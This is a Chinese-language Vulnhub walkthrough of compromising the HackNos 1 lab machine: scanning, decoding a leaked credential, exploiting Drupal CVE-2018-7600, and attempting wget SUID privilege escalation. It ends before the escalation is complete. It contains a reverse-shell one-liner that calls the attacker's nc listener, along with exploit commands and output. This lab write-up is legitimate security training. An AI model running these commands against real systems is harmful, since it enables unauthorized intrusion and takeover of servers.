Vulnhub之HackNos 1详细测试过程

HackNos 1

识别目标主机IP地址

1. (kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:8e:0a:96      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.253  08:00:27:19:13:da      1      60  PCS Systemtechnik GmbH        

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253
NMAP扫描

1. ──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 23:59 EDT
4. Nmap scan report for bogon (192.168.56.253)
5. Host is up (0.000098s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 a5a517704dbe48adba64c107a05503ea (RSA)
11. |   256 f2ce421c04b899539542ab8922669edb (ECDSA)
12. |_  256 4a7d156583af82a31202211c2349fbe9 (ED25519)
13. 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
14. |_http-title: Apache2 Ubuntu Default Page: It works
15. |_http-server-header: Apache/2.4.18 (Ubuntu)
16. MAC Address: 08:00:27:19:13:DA (Oracle VirtualBox virtual NIC)
17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
20. Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、80（http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ curl http://192.168.56.253/robots.txt
3. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4. <html><head>
5. <title>404 Not Found</title>
6. </head><body>
7. <h1>Not Found</h1>
8. <p>The requested URL was not found on this server.</p>
9. <hr>
10. <address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.253 Port 80</address>
11. </body></html>
12.                                                                                                                              
13. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
14. └─$ nikto -h http://192.168.56.253
15. - Nikto v2.1.6
16. ---------------------------------------------------------------------------
17. + Target IP:          192.168.56.253
18. + Target Hostname:    192.168.56.253
19. + Target Port:        80
20. + Start Time:         2023-03-25 00:00:46 (GMT-4)
21. ---------------------------------------------------------------------------
22. + Server: Apache/2.4.18 (Ubuntu)
23. + The anti-clickjacking X-Frame-Options header is not present.
24. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
25. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
26. + No CGI Directories found (use '-C all' to force check all possible dirs)
27. + Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 59633974a1f12, mtime: gzip
28. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
29. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
30. + OSVDB-3233: /icons/README: Apache default file found.
31. + 7915 requests: 0 error(s) and 7 item(s) reported on remote host
32. + End Time:           2023-03-25 00:01:36 (GMT-4) (50 seconds)
33. ---------------------------------------------------------------------------
34. + 1 host(s) tested
35.                                                

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ gobuster dir -u http://192.168.56.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.253
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              php,html,js,sh,txt
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/03/25 00:02:08 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /index.html           (Status: 200) [Size: 11321]
19. /.html                (Status: 403) [Size: 279]
20. /.php                 (Status: 403) [Size: 279]
21. /drupal               (Status: 301) [Size: 317] [--> http://192.168.56.253/drupal/]
22. /alexander.txt        (Status: 200) [Size: 393]
23. /.html                (Status: 403) [Size: 279]
24. /.php                 (Status: 403) [Size: 279]
25. /server-status        (Status: 403) [Size: 279]
26. Progress: 1317761 / 1323366 (99.58%)===============================================================
27. 2023/03/25 00:03:14 Finished
28. ===============================================================

复制代码

目录扫描阶段发现了目录：/drupal以及文件：/alexander.txt

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ curl http://192.168.56.253/alexander.txt | base64 -d
3.   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
4.                                  Dload  Upload   Total   Spent    Left  Speed
5. 100   393  100   393    0     0   387k      0 --:--:-- --:--:-- --:--:--  383k
6. +++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
7. ----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
8. ++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
9. >+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
10. ++.<         

复制代码

这是brainfuck编码，用在线网站解码得到：

1. https://www.splitbrain.org/services/ook

复制代码

1. james:Hacker@4514

复制代码

不知道这是ssh的密码还是drupal的密码，分别尝试一下

1. ──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ ssh james@192.168.56.253                                       
3. The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
4. ED25519 key fingerprint is SHA256:h0yIfMN4Bukv3RMUspEBXwOXzImXvIPPSc2RZjB3cEM.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
8. james@192.168.56.253's password:
9. Permission denied, please try again.
10. james@192.168.56.253's password:

复制代码

可以成功登录/drupal
从

1. http://192.168.56.253/drupal/CHANGELOG.txt

复制代码

知道drupal版本为7.57

1. https://github.com/pimps/CVE-2018-7600

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]
2. └─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c ls
4. =============================================================================
5. |          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
6. |                              by pimps                                     |
7. =============================================================================
9. [*] Poisoning a form and including it in cache.
10. [*] Poisoned form ID: form-dCNohd49V58rf0ua7aGYvFK5MXbLR1rN2k0EjcA8Hoo
11. [*] Triggering exploit to execute: ls
12. CHANGELOG.txt
13. COPYRIGHT.txt
14. INSTALL.mysql.txt
15. INSTALL.pgsql.txt
16. INSTALL.sqlite.txt
17. INSTALL.txt
18. LICENSE.txt
19. MAINTAINERS.txt
20. README.txt
21. UPGRADE.txt
22. authorize.php
23. cron.php
24. includes
25. index.php
26. install.php
27. misc
28. modules
29. profiles
30. robots.txt
31. scripts
32. sites
33. themes
34. update.php
35. web.config
36. xmlrpc.php

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]
2. └─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/f'
4. =============================================================================
5. |          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
6. |                              by pimps                                     |
7. =============================================================================
9. [*] Poisoning a form and including it in cache.
10. [*] Poisoned form ID: form-mdv12Axro06nJqcBVq8ymjIsu3depWzXQfJAcAR0aMU
11. [*] Triggering exploit to execute: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/f

复制代码

成功得到了目标主机反弹回来的Shell

1. ──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 33890
6. /bin/sh: 0: can't access tty; job control turned off
7. $ id
8. uid=33(www-data) gid=33(www-data) groups=33(www-data)
9. $ which python
10. $ which python3
11. /usr/bin/python3
12. $ python3 -c 'import pty;pty.spawn("/bin/bash")'
13. www-data@hackNos:/var/www/html/drupal$

复制代码

提权

由于wget有SUID位，根据GTFOBINS网站的步骤进行提权，但是失败：

1. www-data@hackNos:/home/james$ ls -alh
2. ls -alh
3. total 40K
4. drwxr-xr-x 3 james james 4.0K Nov 16  2019 .
5. drwxr-xr-x 3 root  root  4.0K Oct 31  2019 ..
6. -rw------- 1 james james 2.6K Nov 16  2019 .bash_history
7. -rw-r--r-- 1 james james  220 Oct 31  2019 .bash_logout
8. -rw-r--r-- 1 james james 3.7K Oct 31  2019 .bashrc
9. drwx------ 2 james james 4.0K Oct 31  2019 .cache
10. -rw------- 1 root  root   127 Oct 31  2019 .mysql_history
11. -rw-r--r-- 1 james james  655 Oct 31  2019 .profile
12. -rw-r--r-- 1 james james    0 Oct 31  2019 .sudo_as_admin_successful
13. -rw-rw-r-- 1 james james  175 Oct 31  2019 .wget-hsts
14. -rw-r--r-- 1 root  root   357 Nov 16  2019 user.txt
15. www-data@hackNos:/home/james$ cat user.txt
16. cat user.txt
17.    _                                 
18.   | |                                 
19. / __) ______  _   _  ___   ___  _ __
20. \__ \|______|| | | |/ __| / _ \| '__|
21. (   /        | |_| |\__ \|  __/| |   
22.   |_|          \__,_||___/ \___||_|   
23.                                       
24.                                       
26. MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
27. www-data@hackNos:/home/james$

复制代码

提权的方式就是通过下载目标靶机上的passwd，然后构造一个有root权限的用户加入到构造的passwd文件中，然后使用wget -O将内容重定向输入到/etc/passwd中

1. www-data@hackNos:/tmp$ TF=$(mktemp)
2. TF=$(mktemp)
3. www-data@hackNos:/tmp$ chmod +x $TF
4. chmod +x $TF
5. www-data@hackNos:/tmp$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
6. echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
7. www-data@hackNos:/tmp$ /usr/bin/wget --use-askpass=$TF 0
8. /usr/bin/wget --use-askpass=$TF 0
9. /usr/bin/wget: unrecognized option '--use-askpass=/tmp/tmp.3K0o9eZTI0'
10. Usage: wget [OPTION]... [URL]...
12. Try `wget --help' for more options.

复制代码

bob用户是我们要添加的具有root权限的用户

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos1]
2. └─$ openssl passwd -6 -salt jason 123456
3. $6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
4.                                                                                                 

复制代码

[code][/code]
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！